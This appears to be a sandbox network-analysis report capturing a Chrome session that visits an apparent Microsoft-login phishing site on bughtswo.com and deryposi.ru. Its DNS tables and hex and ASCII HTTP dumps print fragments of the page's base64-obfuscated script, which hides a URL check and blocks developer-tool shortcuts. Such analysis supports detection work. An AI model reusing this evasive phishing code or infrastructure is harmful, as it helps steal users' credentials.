                                                            Jan 7, 2025 20:25:06.760768890 CET53595411.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:17.596034050 CET6261753192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:17.596174002 CET5478753192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:17.745565891 CET53547871.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:17.789927006 CET53626171.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:19.425347090 CET5134753192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:19.425491095 CET5943253192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:19.437105894 CET6046553192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:19.437239885 CET6440353192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:19.530364990 CET53604651.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:19.636395931 CET53644031.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:20.471565008 CET5468753192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:20.471678972 CET5226553192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:20.478952885 CET53522651.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:22.562791109 CET5095453192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:22.562999964 CET6534253192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:22.572881937 CET53653421.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:23.628588915 CET5821253192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:23.628812075 CET5662453192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:23.639022112 CET53582121.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:23.639920950 CET53566241.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:25.270168066 CET53651421.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:28.826464891 CET53550991.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:32.079860926 CET138138192.168.2.8192.168.2.255
                                                            Jan 7, 2025 20:25:47.613667965 CET53554461.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:47.706876993 CET53541791.1.1.1192.168.2.8
                                                            Jan 7, 2025 20:25:59.166413069 CET5828153192.168.2.81.1.1.1
                                                            Jan 7, 2025 20:25:59.166870117 CET6422853192.168.2.81.1.1.1
                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Jan 7, 2025 20:25:19.636497974 CET192.168.2.81.1.1.1c2b2(Port unreachable)Destination Unreachable
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 7, 2025 20:24:52.448355913 CET192.168.2.81.1.1.10x6fdStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:52.448477030 CET192.168.2.81.1.1.10x6459Standard query (0)www.google.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:53.709975004 CET192.168.2.81.1.1.10xe1ccStandard query (0)brh5.bughtswo.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:53.710144043 CET192.168.2.81.1.1.10x9596Standard query (0)brh5.bughtswo.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.680020094 CET192.168.2.81.1.1.10x3d2bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.682362080 CET192.168.2.81.1.1.10xc13cStandard query (0)code.jquery.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.683520079 CET192.168.2.81.1.1.10xfb0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.683768034 CET192.168.2.81.1.1.10xdf6fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.684269905 CET192.168.2.81.1.1.10xe07fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.684590101 CET192.168.2.81.1.1.10xbb20Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.395559072 CET192.168.2.81.1.1.10x897fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.395740032 CET192.168.2.81.1.1.10xe0d6Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.461631060 CET192.168.2.81.1.1.10x747cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.462189913 CET192.168.2.81.1.1.10x398aStandard query (0)code.jquery.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.020486116 CET192.168.2.81.1.1.10xb99aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.020613909 CET192.168.2.81.1.1.10xb27Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.054493904 CET192.168.2.81.1.1.10x789fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.054620028 CET192.168.2.81.1.1.10x9420Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:59.165947914 CET192.168.2.81.1.1.10xf284Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:59.166377068 CET192.168.2.81.1.1.10x8c9dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:25:17.596034050 CET192.168.2.81.1.1.10x3f94Standard query (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ruA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:17.596174002 CET192.168.2.81.1.1.10x2648Standard query (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru65IN (0x0001)false
                                                            Jan 7, 2025 20:25:19.425347090 CET192.168.2.81.1.1.10xa05dStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:19.425491095 CET192.168.2.81.1.1.10x6d20Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                            Jan 7, 2025 20:25:19.437105894 CET192.168.2.81.1.1.10x68d1Standard query (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ruA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:19.437239885 CET192.168.2.81.1.1.10x821dStandard query (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru65IN (0x0001)false
                                                            Jan 7, 2025 20:25:20.471565008 CET192.168.2.81.1.1.10x67d7Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:20.471678972 CET192.168.2.81.1.1.10xae58Standard query (0)www.office.com65IN (0x0001)false
                                                            Jan 7, 2025 20:25:22.562791109 CET192.168.2.81.1.1.10x9a74Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:22.562999964 CET192.168.2.81.1.1.10x2ac8Standard query (0)www.office.com65IN (0x0001)false
                                                            Jan 7, 2025 20:25:23.628588915 CET192.168.2.81.1.1.10x357eStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:23.628812075 CET192.168.2.81.1.1.10xa0e0Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                            Jan 7, 2025 20:25:59.166413069 CET192.168.2.81.1.1.10xf585Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:59.166870117 CET192.168.2.81.1.1.10xb320Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 7, 2025 20:24:52.455032110 CET1.1.1.1192.168.2.80x6fdNo error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:52.455210924 CET1.1.1.1192.168.2.80x6459No error (0)www.google.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:53.720381975 CET1.1.1.1192.168.2.80x9596No error (0)brh5.bughtswo.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:53.724263906 CET1.1.1.1192.168.2.80xe1ccNo error (0)brh5.bughtswo.com188.114.96.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:53.724263906 CET1.1.1.1192.168.2.80xe1ccNo error (0)brh5.bughtswo.com188.114.97.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.687005043 CET1.1.1.1192.168.2.80x3d2bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.687005043 CET1.1.1.1192.168.2.80x3d2bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.687005043 CET1.1.1.1192.168.2.80x3d2bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.687005043 CET1.1.1.1192.168.2.80x3d2bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.690093040 CET1.1.1.1192.168.2.80xfb0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.690093040 CET1.1.1.1192.168.2.80xfb0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.690391064 CET1.1.1.1192.168.2.80xdf6fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.691040039 CET1.1.1.1192.168.2.80xe07fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.691040039 CET1.1.1.1192.168.2.80xe07fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:55.691503048 CET1.1.1.1192.168.2.80xbb20No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.402251005 CET1.1.1.1192.168.2.80x897fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.402251005 CET1.1.1.1192.168.2.80x897fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.402468920 CET1.1.1.1192.168.2.80xe0d6No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.468343973 CET1.1.1.1192.168.2.80x747cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.468343973 CET1.1.1.1192.168.2.80x747cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.468343973 CET1.1.1.1192.168.2.80x747cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:56.468343973 CET1.1.1.1192.168.2.80x747cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.027395010 CET1.1.1.1192.168.2.80xb99aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.027395010 CET1.1.1.1192.168.2.80xb99aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.027441025 CET1.1.1.1192.168.2.80xb27No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.061235905 CET1.1.1.1192.168.2.80x9420No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.061270952 CET1.1.1.1192.168.2.80x789fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:57.061270952 CET1.1.1.1192.168.2.80x789fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:24:59.173099995 CET1.1.1.1192.168.2.80xf284No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:17.745565891 CET1.1.1.1192.168.2.80x2648No error (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru65IN (0x0001)false
                                                            Jan 7, 2025 20:25:17.789927006 CET1.1.1.1192.168.2.80x3f94No error (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:17.789927006 CET1.1.1.1192.168.2.80x3f94No error (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:19.432163954 CET1.1.1.1192.168.2.80xa05dNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:19.432177067 CET1.1.1.1192.168.2.80x6d20No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:19.530364990 CET1.1.1.1192.168.2.80x68d1No error (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:19.530364990 CET1.1.1.1192.168.2.80x68d1No error (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:19.636395931 CET1.1.1.1192.168.2.80x821dNo error (0)co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru65IN (0x0001)false
                                                            Jan 7, 2025 20:25:20.478952885 CET1.1.1.1192.168.2.80xae58No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:20.478952885 CET1.1.1.1192.168.2.80xae58No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:20.479612112 CET1.1.1.1192.168.2.80x67d7No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:20.479612112 CET1.1.1.1192.168.2.80x67d7No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:21.618756056 CET1.1.1.1192.168.2.80xe515No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:21.618756056 CET1.1.1.1192.168.2.80xe515No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:22.515305996 CET1.1.1.1192.168.2.80xb678No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:22.515305996 CET1.1.1.1192.168.2.80xb678No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:22.570204973 CET1.1.1.1192.168.2.80x9a74No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:22.570204973 CET1.1.1.1192.168.2.80x9a74No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:22.572881937 CET1.1.1.1192.168.2.80x2ac8No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:22.572881937 CET1.1.1.1192.168.2.80x2ac8No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:23.639022112 CET1.1.1.1192.168.2.80x357eNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:23.639022112 CET1.1.1.1192.168.2.80x357eNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:23.639022112 CET1.1.1.1192.168.2.80x357eNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 20:25:23.639920950 CET1.1.1.1192.168.2.80xa0e0No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:23.639920950 CET1.1.1.1192.168.2.80xa0e0No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:59.173927069 CET1.1.1.1192.168.2.80xb320No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 20:25:59.174221992 CET1.1.1.1192.168.2.80xf585No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                            • brh5.bughtswo.com
                                                            • https:
                                                              • cdnjs.cloudflare.com
                                                              • code.jquery.com
                                                              • challenges.cloudflare.com
                                                              • co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru
                                                            • a.nel.cloudflare.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849718188.114.96.34435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:54 UTC665OUTGET /tgs0/ HTTP/1.1
                                                            Host: brh5.bughtswo.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:55 UTC1243INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tyf%2BarSjZACNcKzPCunGuw39q8kcHi0fpko5o310AZYHF%2B8eAnLSI8sP1nh9siaUOXjVHMT1qrf7LvtugAAcGhiTvuyVQNGLT8HcVAzCXf%2BWFDTbOPCCN3sRRp5txg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=74643&min_rtt=74638&rtt_var=28000&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1573&delivery_rate=38134&cwnd=32&unsent_bytes=0&cid=fc9aa0414241c2d0&ts=445&x=0"
                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6ImJlOERWakNzdlM0dlYwUVBFRXpUbUE9PSIsInZhbHVlIjoiL21kUEYrN3ptblJyN0RJWGs2byt3Y3F4ZmxaNXhoeTk3UlVZeERKODUzWEZGMW1DN1RQMVhmRjlyS2VzdnpIdjJVTzhwRDlTZnR4SlFmWVFwU25JSGFVYzhaWHBnSVhBWVdnU2RjM2gvM0hrYVFXbFZNZm53TWR5NVJNalRpSC8iLCJtYWMiOiIwMGVmYjdkMTM4NTY1MjkyYjRjODUyOTY4ZDFlZDAyNjE1MDE5NDEwZjA2YzQ4MmQ3YzM4YWNhODFhMmVkMDBlIiwidGFnIjoiIn0%3D; expires=Tue, 07-Jan-2025 21:24:55 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                            2025-01-07 19:24:55 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 51 78 64 44 64 42 65 58 6c 35 61 46 68 76 55 6c 68 45 55 57 4a 68 4d 57 35 54 4c 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 56 70 6b 4f 57 35 4e 65 47 52 44 4e 6c 5a 75 55 48 6c 58 65 58 49 77 55 6b 39 4f 4e 79 73 31 57 46 49 76 4b 30 64 72 5a 56 5a 6b 4e 6e 6b 33 57 55 46 32 4d 69 74 7a 55 46 4e 58 62 30 31 6a 54 45 46 72 5a 7a 52 7a 61 33 70 58 52 46 42 52 4d 56 5a 4f 53 6c 64 30 64 6b 78 69 53 54 5a 54 59 6c 70 6c 59 32 35 52 59 6b 6c 50 54 6b 78 69 55 56 5a 53 4f 47 78 46 62 6c 46 55 4e 6d 6c 6f 52 6e 70 51 53 56 68 51 4d 6d 5a 54 5a 48 41 32 4f 46 52 4f 56 55 6b 34 55 55 4a 57 4f 57 59 32 61 6a 45 30 51 7a 42 46 62 32 55
                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjQxdDdBeXl5aFhvUlhEUWJhMW5TL2c9PSIsInZhbHVlIjoiNVpkOW5NeGRDNlZuUHlXeXIwUk9ONys1WFIvK0drZVZkNnk3WUF2MitzUFNXb01jTEFrZzRza3pXRFBRMVZOSld0dkxiSTZTYlplY25RYklPTkxiUVZSOGxFblFUNmloRnpQSVhQMmZTZHA2OFROVUk4UUJWOWY2ajE0QzBFb2U
                                                            2025-01-07 19:24:55 UTC763INData Raw: 34 65 33 33 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 74 68 65 20 6b 65 79 20 74 6f 20 68 61 70 70 69 6e 65 73 73 2e 20 48 61 70 70 69 6e 65 73 73 20 69 73 20 74 68 65 20 6b 65 79 20 74 6f 20 73 75 63 63 65 73 73 2e 20 49 66 20 79 6f 75 20 6c 6f 76 65 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 64 6f 69 6e 67 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 73 75 63 63 65 73 73 66 75 6c 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 44 6f 6e 26 23 30 33 39 3b 74 20 77 61 74 63 68 20 74 68 65 20 63 6c 6f 63 6b 3b 20 64 6f 20 77 68 61 74 20 69 74 20 64 6f 65 73 2e 20 4b 65 65 70 20 67 6f 69 6e 67 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 69 55 6b 67 31 4c 6d 4a 31 5a 32 68 30 63 33 64 76
                                                            Data Ascii: 4e33... Success is not the key to happiness. Happiness is the key to success. If you love what you are doing, you will be successful. --><script>/* Don&#039;t watch the clock; do what it does. Keep going. */if(atob("aHR0cHM6Ly9iUkg1LmJ1Z2h0c3dv
                                                            2025-01-07 19:24:55 UTC1369INData Raw: 41 38 62 57 56 30 59 53 42 6f 64 48 52 77 4c 57 56 78 64 57 6c 32 50 53 4a 59 4c 56 56 42 4c 55 4e 76 62 58 42 68 64 47 6c 69 62 47 55 69 49 47 4e 76 62 6e 52 6c 62 6e 51 39 49 6b 6c 46 50 55 56 6b 5a 32 55 73 59 32 68 79 62 32 31 6c 50 54 45 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 4a 76 59 6d 39 30 63 79 49 67 59 32 39 75 64 47 56 75 64 44 30 69 62 6d 39 70 62 6d 52 6c 65 43 77 67 62 6d 39 6d 62 32 78 73 62 33 63 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b 5a 58 5a 70 59 32 55 74 64 32 6c 6b 64 47 67 73 49 47 6c 75 61 58 52 70 59 57 77 74 63 32 4e 68 62 47 55 39 4d 53 34 77 49
                                                            Data Ascii: A8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wI
                                                            2025-01-07 19:24:55 UTC1369INData Raw: 6a 59 57 78 6a 4b 43 34 35 4d 44 42 79 5a 57 30 67 4b 79 41 75 4d 33 5a 33 4b 54 74 39 44 51 6f 6a 5a 6b 5a 6f 5a 6d 52 6d 55 45 56 73 63 69 41 75 61 6e 56 7a 64 47 6c 6d 65 53 31 6a 62 32 35 30 5a 57 35 30 4c 57 4e 6c 62 6e 52 6c 63 6e 74 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 59 32 56 75 64 47 56 79 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 5a 6b 5a 6f 5a 6d 52 6d 55 45 56 73 63 69 35 74 64 43 30 31 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 33 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 32 5a 47 61 47 5a 6b 5a 6c 42 46 62 48 49 67 4c 6d 31 30 4c 54 51 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 46 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69
                                                            Data Ascii: jYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojZkZoZmRmUEVsciAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojZkZoZmRmUEVsci5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI2ZGaGZkZlBFbHIgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCi
                                                            2025-01-07 19:24:55 UTC1369INData Raw: 49 47 56 32 5a 57 35 30 4c 6d 46 73 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 31 6c 64 47 46 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 59 57 78 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 59 33 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 62 57 56 30 59 55 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 4e 43 69 41 67 49 43 41 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 58 5a 6c 62 6e 51 75 63 48 4a 6c 64 6d 56 75 64 45 52
                                                            Data Ascii: IGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudER
